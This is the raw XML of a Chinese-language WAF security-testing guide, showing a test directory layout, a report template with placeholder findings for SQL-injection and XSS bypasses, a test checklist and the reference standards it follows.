    <w:p w14:paraId="479324C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/waf-baseline/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270CCE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├── config/                    # WAF 配置快照</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF59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├── baseline-v1.0.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7004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└── baseline-v1.1.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B197B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├── reports/                   # 测试报告存档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA2CC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├── 2026-Q1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7560F6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└── 2026-Q2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D32BC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├── testcases/                 # 自定义测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542CEC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├── business/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A8987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└── bypass/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5319A3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└── baseline.md               # 基线说明文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8F56B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2D01FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5361530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70019F88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084355C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八、报告模板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C88352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="619702F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8.1 执行摘要</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09969664">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315C81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┌────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D796A9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                 WAF 安全验证报告                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2CF2B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├────────────────────────────────────────────────────────────┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0999139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项目名称：[项目名称]                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F523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WAF 产品：[WAF名称及版本]                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D75D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测试日期：[YYYY年MM月DD日]                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209FF3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测试人员：[测试人员姓名]                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172983D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├────────────────────────────────────────────────────────────┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698E789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综合评分：[XX.X]% ([等级])                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAD80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风险等级：[低/中/高]                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C4CA7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├────────────────────────────────────────────────────────────┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553EC5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测试统计：                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CDDA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- 总请求数：[XXX]                                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9034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- 已拦截：[XXX] ([XX.X]%)                                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046CE7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- 已绕过：[XXX] ([XX.X]%)                                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C59D6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│   - 误报数：[XXX] ([XX.X]%)                                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7360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└────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A295A87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6852BA1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F506C9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8.2 详细发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F9041B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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446"/>
        <w:gridCol w:w="1016"/>
        <w:gridCol w:w="1150"/>
        <w:gridCol w:w="1150"/>
      </w:tblGrid>
      <w:tr w14:paraId="1D5B0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472C4"/>
          </w:tcPr>
          <w:p w14:paraId="2AF54C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编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="6AC8A7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发现项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="6A194B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严重程度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="71367E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问题描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="09D0B4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</w:rPr>
              <w:t>建议措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5567B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6F5B17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F001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2A99C7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SQL注入绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="539C1E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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="64A89FC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[具体描述]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="694144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[修复建议]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2D9AD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E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="3BA18C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F002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="4B1496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XSS绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="131E96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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="6D4771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[具体描述]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="2B28AE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[修复建议]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7A12D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FF"/>
          </w:tcPr>
          <w:p w14:paraId="5CB471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F003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="114071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误报问题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="329DBA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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0D7476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[具体描述]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="29194A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[修复建议]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27D48BAA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB5F3EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BE2BE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8.3 优化建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280AD1C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFAB13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根据测试结果，提出具体优化建议：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2348B387">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D17C8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规则优化建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B4ED1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针对 [攻击类型] 增加检测规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0071081C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调整 [规则ID] 的敏感度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D73249">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02115C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配置优化建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771AB17B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启用 [功能名称]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B6545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调整 [参数名称] 为 [建议值]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7706387D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42AD33E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架构优化建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD61939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建议 [架构调整内容]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3757EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5992C74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7864589C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D03C1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九、附录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B8465C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E57F33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测试检查清单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C82ADB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784A4D11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[ ] 测试环境部署完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A6D6ED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[ ] WAF 配置已确认</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D61547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[ ] 网络连通性已验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674F10AE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[ ] 测试工具已准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399555F8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[ ] 测试用例已审核</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFB496A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[ ] 基线测试已完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691B7E80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[ ] 进阶测试已完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABD23C2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[ ] 误报测试已完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA91A1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[ ] 测试报告已生成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3680C511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[ ] 优化建议已确认</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2B3CD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[ ] 复测验证已完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392231AD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FADFA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参考标准</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5443EFD3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C3CD682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OWASP ModSecurity Core Rule Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459FD441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OWASP API Security Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAC7A0A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PCI DSS Requirement 6.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8C9BC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/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NIST SP 800-53 SC-7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AC5E80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId3" w:type="default"/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EA48A">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="570"/>
        <w:tab w:val="center" w:pos="4550"/>
        <w:tab w:val="left" w:pos="5818"/>
        <w:tab w:val="right" w:pos="8046"/>
      </w:tabs>
      <w:ind w:right="260" w:firstLine="360"/>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="0F243E" w:themeColor="text2" w:themeShade="80"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:tab/>
    </w:r>
  </w:p>
  <w:p w14:paraId="47CB1B4C">
    <w:pPr>
      <w:pStyle w:val="6"/>
      <w:pBdr>
        <w:top w:val="single" w:color="auto" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:b/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="21"/>
      </w:rPr>
      <w:t>商密</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:b/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:b/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t xml:space="preserve">  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve">Copyright © </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="21"/>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t>上海</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="21"/>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t>斗象信息科技有限公司</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="21"/>
      </w:rPr>
      <w:t>20</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="21"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="21"/>
        <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:t>6</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve"> All Rights Reserved </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:vanish/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="21"/>
      </w:rPr>
      <w:t>v2.2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:rPr>
      <w:t>8</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:rPr>
      <w:instrText xml:space="preserve">NUMPAGES  \* Arabic  \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:rPr>
      <w:t>26</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
        <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="09D2BA3A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1017FB5"/>
    <w:rsid w:val="0268068B"/>
    <w:rsid w:val="02D966EE"/>
    <w:rsid w:val="083E7612"/>
    <w:rsid w:val="0B393AF8"/>
    <w:rsid w:val="0B701A53"/>
    <w:rsid w:val="0DE23A56"/>
    <w:rsid w:val="168A0107"/>
    <w:rsid w:val="18F062F7"/>
    <w:rsid w:val="19023CAC"/>
    <w:rsid w:val="196440B8"/>
    <w:rsid w:val="1BF730CC"/>
    <w:rsid w:val="1D795467"/>
    <w:rsid w:val="1E161E6D"/>
    <w:rsid w:val="20E9190B"/>
    <w:rsid w:val="2107473E"/>
    <w:rsid w:val="23653CED"/>
    <w:rsid w:val="23D941DC"/>
    <w:rsid w:val="2759777C"/>
    <w:rsid w:val="2B5074C0"/>
    <w:rsid w:val="2CE079AD"/>
    <w:rsid w:val="2D607001"/>
    <w:rsid w:val="32D8387B"/>
    <w:rsid w:val="33917B56"/>
    <w:rsid w:val="33E47230"/>
    <w:rsid w:val="33F268DA"/>
    <w:rsid w:val="34F60372"/>
    <w:rsid w:val="358F0156"/>
    <w:rsid w:val="36D1697E"/>
    <w:rsid w:val="3C7A5BC5"/>
    <w:rsid w:val="3F3F5454"/>
    <w:rsid w:val="402975CF"/>
    <w:rsid w:val="42663283"/>
    <w:rsid w:val="4B00559A"/>
    <w:rsid w:val="4BBB7ECB"/>
    <w:rsid w:val="4CF24F29"/>
    <w:rsid w:val="4D2D7C95"/>
    <w:rsid w:val="505A2863"/>
    <w:rsid w:val="50DF2ABC"/>
    <w:rsid w:val="51506273"/>
    <w:rsid w:val="5526593F"/>
    <w:rsid w:val="55F1630D"/>
    <w:rsid w:val="57411F01"/>
    <w:rsid w:val="5791383A"/>
    <w:rsid w:val="58191195"/>
    <w:rsid w:val="5D174855"/>
    <w:rsid w:val="5E590CDA"/>
    <w:rsid w:val="5E893A28"/>
    <w:rsid w:val="61C06A6D"/>
    <w:rsid w:val="623C31ED"/>
    <w:rsid w:val="64C03B57"/>
    <w:rsid w:val="64C228DE"/>
    <w:rsid w:val="64D07675"/>
    <w:rsid w:val="64EA021F"/>
    <w:rsid w:val="664A6EE1"/>
    <w:rsid w:val="67BB003D"/>
    <w:rsid w:val="68D6620B"/>
    <w:rsid w:val="6B3218ED"/>
    <w:rsid w:val="6BA658C1"/>
    <w:rsid w:val="706224EF"/>
    <w:rsid w:val="726A4AC3"/>
    <w:rsid w:val="74CE1D2E"/>
    <w:rsid w:val="764B251F"/>
    <w:rsid w:val="78150891"/>
    <w:rsid w:val="78BE5827"/>
    <w:rsid w:val="7A5A30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theme="minorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cstheme="minorBidi"/>
      <w:b/>
      <w:color w:val="2F5496"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
